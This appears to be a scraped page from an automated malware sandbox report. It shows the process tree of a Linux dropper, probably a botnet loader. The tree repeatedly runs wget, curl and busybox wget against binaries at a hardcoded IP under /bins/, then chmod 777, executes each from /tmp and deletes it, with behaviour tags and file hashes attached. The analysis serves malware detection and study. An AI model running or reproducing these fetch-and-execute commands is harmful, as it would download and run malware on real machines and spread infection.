/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:933
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:937
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:943
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:949
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:955
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:961
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:967
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:973
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97